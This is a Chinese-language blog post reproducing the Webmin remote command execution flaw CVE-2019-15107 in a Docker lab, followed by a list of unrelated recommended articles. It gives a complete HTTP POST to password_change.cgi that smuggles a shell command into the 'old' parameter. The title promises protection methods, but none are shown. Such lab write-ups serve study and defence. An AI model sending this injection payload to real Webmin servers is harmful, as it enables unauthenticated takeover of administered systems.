Webmin远程命令执行漏洞复现及防护方法

作者：爱爱爱爱你MLB-你 | 来源：互联网 | 2023-12-13 16:14

本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法，同时提供了防护方法。漏洞存在于Webmin的找回密码页面中，攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外，还指出了参考链接中的数据包不准确的问题，并解释了漏洞触发的条件。最后，给出了防护方法以避免受到该漏洞的攻击。

CVE-2019-15107_Webmin 远程命令执行漏洞

漏洞详情

Webmin是一个用于管理类Unix系统的管理配置工具&＃xff0c;具有Web页面。在其找回密码页面中&＃xff0c;存在一处无需权限的命令注入漏洞&＃xff0c;通过这个漏洞攻击者即可以执行任意系统命令。

参考链接&＃xff1a;

-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

- https://www.exploit-db.com/exploits/47230

- https://blog.firosolutions.com/exploits/webmin/

环境搭建

靶场&＃xff1a;192.168.4.10_Ubuntu

执行如下命令&＃xff0c;启动webmin 1.910&＃xff1a;

#docker-compose up -d

执行完成后&＃xff0c;访问&＃96;https://your-ip:10000&＃96;&＃xff0c;忽略证书后即可看到webmin的登录页面。

漏洞复现

参考链接中的数据包是不对的&＃xff0c;经过阅读代码可知&＃xff0c;只有在发送的user参数的值不是已知Linux用户的情况下&＃xff08;而参考链接中是&＃96;user&＃61;root&＃96;&＃xff09;&＃xff0c;才会进入到修改&＃96;/etc/shadow&＃96;的地方&＃xff0c;触发命令注入漏洞。

发送如下数据包&＃xff0c;即可执行命令&＃96;id&＃96;&＃xff1a;

&＃96;&＃96;&＃96;

POST /password_change.cgi HTTP/1.1

Host: your-ip:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

COOKIE: redirect&＃61;1; testing&＃61;1; sid&＃61;x; sessiontest&＃61;1

Referer: https://your-ip:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user&＃61;rootxx&pam&＃61;&expired&＃61;2&old&＃61;test|id&new1&＃61;test2&new2&＃61;test2

&＃96;&＃96;&＃96;

推荐阅读

docker
在 Ubuntu 22.04 LTS 上部署 Jira 敏捷项目管理工具

Jira 敏捷项目管理工具专为软件开发团队设计，旨在以高效、有序的方式管理项目、问题和任务。该工具提供了灵活且可定制的工作流程，能够根据项目需求进行调整。本文将详细介绍如何在 Ubuntu 22.04 LTS 上安装和配置 Jira。 ... [详细]

蜡笔小新 2024-11-19 09:56:22
bash
Docker安全策略与管理

本文探讨了Docker的安全挑战、核心安全特性及其管理策略，旨在帮助读者深入理解Docker安全机制，并提供实用的安全管理建议。 ... [详细]

蜡笔小新 2024-11-21 20:03:03
config
探索阿里巴巴的开源世界

从理想主义者的内心深处萌发的技术信仰，推动了云原生技术在全球范围内的快速发展。本文将带你深入了解阿里巴巴在开源领域的贡献与成就。 ... [详细]

蜡笔小新 2024-11-21 09:06:54
config
MongoDB 高可用集群搭建指南：分片、读写分离与负载均衡

本文详细介绍了如何搭建一个高可用的MongoDB集群，包括环境准备、用户配置、目录创建、MongoDB安装、配置文件设置、集群组件部署等步骤。特别关注分片、读写分离及负载均衡的实现。 ... [详细]

蜡笔小新 2024-11-20 18:28:16
const
UE4 中的距离场技术详解

本文将深入探讨 Unreal Engine 4 (UE4) 中的距离场技术，包括其原理、实现细节以及在渲染中的应用。距离场技术在现代游戏引擎中用于提高光照和阴影的效果，尤其是在处理复杂几何形状时。文章将结合具体代码示例，帮助读者更好地理解和应用这一技术。 ... [详细]

蜡笔小新 2024-11-19 18:21:03
config
在Ubuntu 18.04上使用Nginx搭建RTMP流媒体服务器

本文详细介绍了如何在Ubuntu 18.04上使用Nginx和nginx-rtmp-module模块搭建RTMP流媒体服务器，包括环境搭建、配置文件修改和推流拉流操作。适用于需要搭建流媒体服务器的技术人员。 ... [详细]

蜡笔小新 2024-11-18 18:26:08
config
Ubuntu系统下的GIF动画录制解决方案

在撰写文章或教程时，GIF动态图能够有效地传达信息。对于Windows用户而言，ScreenToGif是一款非常实用的工具。而在Ubuntu系统中，用户同样拥有多种选择来创建GIF动画，本文将重点介绍两款录屏工具——Byzanz和Peek。 ... [详细]

蜡笔小新 2024-11-22 13:24:34
config
搭建个人博客：WordPress安装详解

计划建立个人博客来分享生活与工作的见解和经验，选择WordPress是因为它专为博客设计，功能强大且易于使用。 ... [详细]

蜡笔小新 2024-11-22 11:13:36
config
利用 Calcurse 在 Linux 终端高效管理日程与任务

对于喜爱使用 Linux 终端进行日常操作的系统管理员来说，Calcurse 提供了一种强大的方式来管理日程安排、待办事项及会议。本文将详细介绍如何在 Linux 上安装和使用 Calcurse，帮助用户更有效地组织工作。 ... [详细]

蜡笔小新 2024-11-21 17:01:54
config
将图像平移到画布中心python_python – Tkinter画布缩放移动/平移

高级缩放示例.就像谷歌地图一样.它仅缩放图块,但不缩放整个图像.因此,缩放的瓷砖占据了恒定的记忆,并且不会为大型缩放图像调整大小的图像.对于简化的缩放示例lookhere.在Win ... [详细]

蜡笔小新 2024-11-20 15:47:04
config
Linux核心概念与发行版概览

本文介绍了Linux操作系统的核心组成部分——内核及其版本分类，以及市面上常见的几种Linux发行版，旨在为初学者提供一个清晰的学习路径。 ... [详细]

蜡笔小新 2024-11-20 10:09:16
window
C# 中创建和执行存储过程的方法

本文详细介绍了如何使用 C# 创建和调用 SQL Server 存储过程，包括连接数据库、定义命令类型、设置参数等步骤。 ... [详细]

蜡笔小新 2024-11-19 19:55:59
config
解决在Ubuntu上编译VLC for Android的挑战

本文分享了作者在不同版本的Ubuntu系统上尝试编译VLC for Android的经历，包括遇到的技术难题及解决方案，旨在帮助开发者避免常见的编译问题。 ... [详细]

蜡笔小新 2024-11-19 11:35:33
config
Ubuntu 环境下 MySQL、Tomcat 和 JDK 的安装与配置指南

本文详细介绍了在 Ubuntu 系统上安装和配置 MySQL、Tomcat 和 JDK 的步骤。通过本文，您将了解如何顺利安装这些组件，并确保它们能够正常协同工作。 ... [详细]

蜡笔小新 2024-11-18 10:21:36
config
使用Java ProcessBuilder类调用外部程序的方法详解

在Java开发中，如何利用ProcessBuilder类调用外部程序是一个常见的需求。本文将详细介绍ProcessBuilder类的使用方法，并提供示例代码帮助你更好地理解和应用。 ... [详细]

蜡笔小新 2024-11-17 23:40:41

爱爱爱爱你MLB-你

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章